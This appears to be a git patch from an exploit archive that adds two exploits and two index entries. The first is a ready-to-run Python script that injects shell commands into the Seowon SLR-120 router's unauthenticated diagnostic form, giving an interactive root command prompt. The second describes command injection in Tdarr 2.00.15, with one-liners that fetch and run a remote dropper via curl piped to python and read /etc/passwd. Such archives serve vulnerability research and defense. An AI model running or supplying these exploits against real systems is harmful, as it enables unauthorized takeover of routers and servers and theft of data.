From 653f886e0be5a632fcc95c558a3ee5e127f1a149 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 12 Mar 2022 05:01:35 +0000 Subject: [PATCH] DB: 2022-03-12 2 changes to exploits/shellcodes Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) Tdarr 2.00.15 - Command Injection --- exploits/hardware/remote/50821.py | 82 ++++++++++++++++++++++++++++++ exploits/multiple/remote/50822.txt | 15 ++++++ files_exploits.csv | 2 + 3 files changed, 99 insertions(+) create mode 100755 exploits/hardware/remote/50821.py create mode 100644 exploits/multiple/remote/50822.txt diff --git a/exploits/hardware/remote/50821.py b/exploits/hardware/remote/50821.py new file mode 100755 index 000000000..63e854b47 --- /dev/null +++ b/exploits/hardware/remote/50821.py @@ -0,0 +1,82 @@ +# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) +# Date: 2022-03-11 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: http://www.seowonintech.co.kr +# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30 +# Version: All version +# Tested on: Windows 10 Enterprise x64 , Linux +# CVE : CVE-2020-17456 + +# [ About - Seowon SLR-120 router ]: + +#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile, +#The convenience of sharing wireless internet access invigorates your lifestyle, families, +#friends and workmates. Carry it around to boost your active communication anywhere. + +# [ Description ]: + +#Execute commands without authentication as admin user , +#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user. + +# [ Vulnerable products ]: + +#SLR-120S42G +#SLR-120D42G +#SLR-120T42G + +import requests + +print (''' +########################################################### +# Seowon SLR-120S42G router - RCE (Unauthenticated) # +# BY:Aryan Chehreghani # +# Team:TAPESH DIGITAL SECURITY TEAM IRAN # +# mail:aryanchehreghani@yahoo.com # +# -+-USE:python script.py # +# Example Target : http://192.168.1.1:443/ # +########################################################### +''') + +url = input ("=> Enter Target : ") + +while(True): + + try: + + cmd = input ("~Enter Command $ ") + + header = { +"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0", +"Accept": "*/*", +"Accept-Language": "en-US,en;q:0.5", +"Accept-Encoding": "gzip, deflate", +"Content-Type": "application/x-www-form-urlencoded", +"Content-Length": "207", +"Origin": "http://192.168.1.1", +"Connection": "close", +"Referer": "http://192.168.1.1/", +"Upgrade-Insecure-Requests": "1" +} + + datas = { +'Command':'Diagnostic', +'traceMode':'ping', +'reportIpOnly':'', +'pingIpAddr':';'+cmd, +'pingPktSize':'56', +'pingTimeout':'30', +'pingCount':'4', +'maxTTLCnt':'30', +'queriesCnt':'3', +'reportIpOnlyCheckbox':'on', +'logarea':'com.cgi', +'btnApply':'Apply', +'T':'1646950471018' +} + + x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas) + + print(x.text) + + except: + break \ No newline at end of file diff --git a/exploits/multiple/remote/50822.txt b/exploits/multiple/remote/50822.txt new file mode 100644 index 000000000..0b012257b --- /dev/null +++ b/exploits/multiple/remote/50822.txt @@ -0,0 +1,15 @@ +# Exploit Title: Tdarr 2.00.15 - Command Injection +# Date: 10/03/2022 +# Exploit Author: Sam Smith +# Vendor Homepage: https://tdarr.io +# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip +# Version: 2.00.15 (likely also older versions) +# Tested on: 2.00.15 + +Exploit: + +The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. + +eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. + +Tdarr is not protected by any auth by default and no credentials are required to trigger RCE \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 255d64cc3..bb3d82f8b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18647,6 +18647,8 @@ id,file,description,date,author,type,platform,port 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows, 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows, 50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware, +50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware, +50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,